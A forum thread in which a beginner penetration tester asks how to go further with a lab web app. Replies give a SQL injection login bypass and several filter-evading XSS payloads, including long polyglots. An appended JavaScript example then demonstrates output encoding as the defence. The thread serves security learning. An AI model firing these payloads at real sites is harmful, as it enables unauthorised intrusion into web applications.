
Hello team, I'm new here, as I am new to penetration testing. My next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server. I successfully finished with the Win XP in all aspects; as for the CentOS, I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information, but that was it. I tried using scripts (<script>alert(1);</script>) but nothing worked; a Nessus scan showed it's XSS vulnerable.

I guess my main point is: how much further can I dig into the target, and how?

 

Cheers


Unfortunately, without a lot more info, your question is too vague to give any specific help. How good are your HTML and JavaScript skills?

I'd suggest looking at the SecurityTube web app testing videos, they cover stuff like this and should give you a good idea of what is going on.

And if you are following a course, I'd look for a more up-to-date one; anything still using XP as a victim is very out of date.


Also, I would suggest looking in the console of your browser for errors when injecting.

As already mentioned, without knowing the app or the JS/HTML of the page it's hard to give a working payload.

However, you can try either 

-->'";</ScriPT><sCriPt><confirm()</scRiPt> 

Which may better break out of the HTML and is nice and short (similar to what you tried, but I included single and double quotes and also the end of a comment, in case you end up in a comment section).

Or you can try a polyglot injection payload (these will usually set off a WebApp Firewall, but feel free to try):

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">onerror=confirm().source<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" 

Or 

jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

which are both attempting to do the same thing.

Good luck.

 

*****

EDIT

While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image.

This is the equivalent of <img src="x" />

From here you would just need to tweak the code to pop an alert on a broken image; remember to read the console and attempt to bypass protections.

onerror=confirm() or something similar for a basic pop on a broken image.

****

 

Edited by zoro25
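The reason the short payload above carries a quote of each kind plus a comment closer is that the reflected value may land in a text node, a quoted attribute or an HTML comment, and each context needs a different character to break out. The fix on the server side is context-aware output encoding. The following is an added example written for this thread, not code from the forum or from any product discussed here; the page templates and the scanner are assumptions, and the sample input is the break-out string quoted above.

```javascript
// Added example (not from the thread): context-aware output encoding, the fix
// for the reflected XSS being probed above. Templates below are assumptions.

// Encode untrusted data for an HTML text node or a double-quoted attribute.
// Every character the quoted payload relies on (< > " ') becomes an entity;
// "-->" is harmless once ">" is encoded. Attribute values MUST be quoted for
// this to hold, and a value dropped inside <script> or a URL needs a different
// encoder; HTML entity encoding is not enough there.
function encodeHtml(untrusted) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Three places a login form might reflect the submitted username.
// "Vulnerable" versions paste the value in verbatim; "safe" versions encode it.
function renderTextVulnerable(username) {
  return `<p>Unknown user: ${username}</p>`;
}
function renderTextSafe(username) {
  return `<p>Unknown user: ${encodeHtml(username)}</p>`;
}
function renderAttrVulnerable(username) {
  return `<input name="user" value="${username}">`;
}
function renderAttrSafe(username) {
  return `<input name="user" value="${encodeHtml(username)}">`;
}
// There is no safe encoding for an HTML comment: "-->" ends it early, so
// untrusted data must never be placed inside one at all.
function renderCommentVulnerable(username) {
  return `<!-- last login attempt: ${username} -->`;
}

// Crude scanner for a test suite: does a script tag or an event-handler
// attribute survive in the rendered output? A real check renders the page in
// a browser; this regex is only a fast first signal.
function hasScriptVector(html) {
  return /<\s*\/?\s*script\b/i.test(html) || /\son[a-z]+\s*=/i.test(html);
}

// Constructed input: the short break-out payload quoted in the thread.
const SAMPLE_PAYLOAD = "-->'\";</ScriPT><sCriPt><confirm()</scRiPt>";

// Expected: every vulnerable renderer keeps the vector; every safe one strips it.
const report = {
  textVulnerable: hasScriptVector(renderTextVulnerable(SAMPLE_PAYLOAD)),       // true
  textSafe: hasScriptVector(renderTextSafe(SAMPLE_PAYLOAD)),                   // false
  attrVulnerable: hasScriptVector(renderAttrVulnerable(SAMPLE_PAYLOAD)),       // true
  attrSafe: hasScriptVector(renderAttrSafe(SAMPLE_PAYLOAD)),                   // false
  commentVulnerable: hasScriptVector(renderCommentVulnerable(SAMPLE_PAYLOAD)), // true
};
console.log(report);
```

The same scanner run against the browser console's view of the page is the quickest way to confirm which context the reflected value actually landed in.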
